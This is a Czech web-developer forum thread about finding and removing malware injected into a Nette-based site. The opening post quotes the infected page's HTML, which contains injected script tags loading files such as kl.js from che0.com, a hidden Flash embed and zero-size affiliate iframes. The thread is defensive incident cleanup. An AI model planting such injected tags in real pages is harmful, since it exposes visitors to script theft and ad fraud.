Jak odstranit skodlivy kod ze zavirovaneho nette?

před 4 lety
scientific
Člen | 94
+
0
-

Ahoj všem, prosím si o radu, jak najít vir v nette projektu.

Na začátek body mi to (jen někdy) sází nějaké srajdy.

Děkuji moc.

<body>
        <script src="/plugins/nette-forms/netteForms.min.js"></script>
    <script src="/plugins/jquery/jquery-1.12.4.min.js"></script><script src="//che0.com/js/css.js"></script><script src="//che0.com/js/kl.js"></script>
<script src="//che0.com/js/day.js"></script><embed src="//che0.com/day.swf" width="0" height="0">
<iframe src="//vacations.ctrip.com/?Allianceid=1112909&amp;sid=2590602&amp;OUID=A100221287" width="0" height="0" frameborder="0"></iframe>
<iframe src="https://click.union.vip.com/redirect.php?url=eyJ1Y29kZSI6ImQyMjM4ZWYxIiwic2NoZW1lY29kZSI6ImQxMmhkaTVsIn0=&amp;chan=A100221287&amp;desturl=https://www.vip.com/" width="0" height="0" frameborder="0"></iframe>

<script src="//che0.com/js/day30.js"></script>
<script src="//che0.com/js/clipboard.min.js"></script>

        <script src="/plugins/jquery-ui/jquery-ui.min.js"></script>
                <script src="/plugins/video-js/video.dev.js"></script>
    <script>
        var basePath = "";
        videojs.options.flash.swf = basePath+"/plugins/video-js//video-js.swf";
    </script>
        <script src="/plugins/video-js-resolutions/video-js-resolutions.js"></script>
        <script src="/plugins/ckeditor/ckeditor.js"></script>
    <script src="/plugins/ckeditor/adapters/jquery.js"></script>
        <script src="/plugins/nette-ajax/nette.ajax.js"></script>
        <script src="/plugins/file-tree/jqueryFileTree.js"></script>
        <script src="/plugins/dotdotdot/jquery.dotdotdot.min.js"></script>

    <script src="/js/bootstrap.min.js"></script>

            <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js"></script>

    <script src="/plugins/lightGallery-master/dist/js/lightgallery.min.js"></script>
    <script src="/plugins/lightGallery-master/dist/js/lg-thumbnail.min.js"></script>
    <script src="/plugins/lightGallery-master/dist/js/lg-fullscreen.min.js"></script>

    <script src="/js/main.js"></script>

  <div class="loading_page"></div>


      <!-- Navigation -->
  <nav class="navbar navbar-inverse" role="navigation">
    <div class="container">

bla bla bla

Editoval scientific (18. 9. 2020 11:19)

před 4 lety
David Matějka
Moderator | 6445
+
0
-
  • zacal bych hledanim tech tech klicovych slov v kodu, jako che0
  • a tohle je primo response ze serveru nebo aktualni DOM? tim zjistis, jestli je infikovany PHP nebo JS
před 4 lety
Kamil Valenta
Člen | 822
+
0
-

Tohle se vždy hledá dost špatně. Taková mravenčí práce.
Mrkni do šablony, ověř blocky v těch místech.
Také si promázni cache, možná byly modifikovány jen soubory v cache. A rovnou ověř oprávnění zápisu do /temp/cache/latte, resp. /temp/cache

před 4 lety
Kamil Valenta
Člen | 822
+
0
-

David Matějka napsal(a):

  • zacal bych hledanim tech tech klicovych slov v kodu, jako che0

Málokdy tam ta URL bývají jako plaintext. Většinou je to zabalené do nějaké JS substituce znaků, takže to vyhledáváním nenajdeš.

před 4 lety
David Matějka
Moderator | 6445
+
0
-

tady je třeba nějaký scanner kódu https://github.com/…ware-scanner

před 4 lety
scientific
Člen | 94
+
0
-
  • To jsem zkoušel, ale nic jsem nenašel.
  • Edit: Sice jsem hledal, ale ve špatném adresáři, už jsem si vzpomněl, kde to je.
  • Je to v: www/plugins/jquery/jquery-1.12.4.min.js
  • Což je i odpověť na tvoji druhou otázku. Není to generováno serverem, ale je to tam injektováno až na straně klienta (v prohlížeči).
  • Nikde jinde jsem to nenasel, mám ještě raději zkusit ten malware-scanner? Nejsem si jistý, jak bude fungovat v případě, kdy web má 3 TB, tím přetížím celý cluster ne. :-D

Vzpomněl jsem si, že už jsem jednou obnovoval zálohu toho souboru, abych to odstranil.

Co tedy dál, jak to odstranit trvale, aby se to nevracelo? Že by to byla otázka na kterou neexistuje jednoduchá odpověď, jelikož je to umožněno nějakou bezpečnostní chyba z vývoje, kterou není možné snadno najít, pokud člověk není expert na securitu?

Editoval scientific (18. 9. 2020 11:49)

před 4 lety
Kamil Valenta
Člen | 822
+
0
-

Jaká práva jsou na jquery-1.12.4.min.js a na jeho adresář?
Můžeš stáhnout čistou jquery a přehrát to. Nebo ji includovat z CDN s kontrolním otiskem.

Editoval kamil_v (18. 9. 2020 13:05)

před 4 lety
scientific
Člen | 94
+
0
-

Odstraněno obnovení jquery knihovny z gitu, odinstalací FTP, a změnou hesla k uživateli webu.

Někomu uniklo heslo k FTP do rukou číňanů. :-D

Děkuji všem za pomoc, vyřešeno.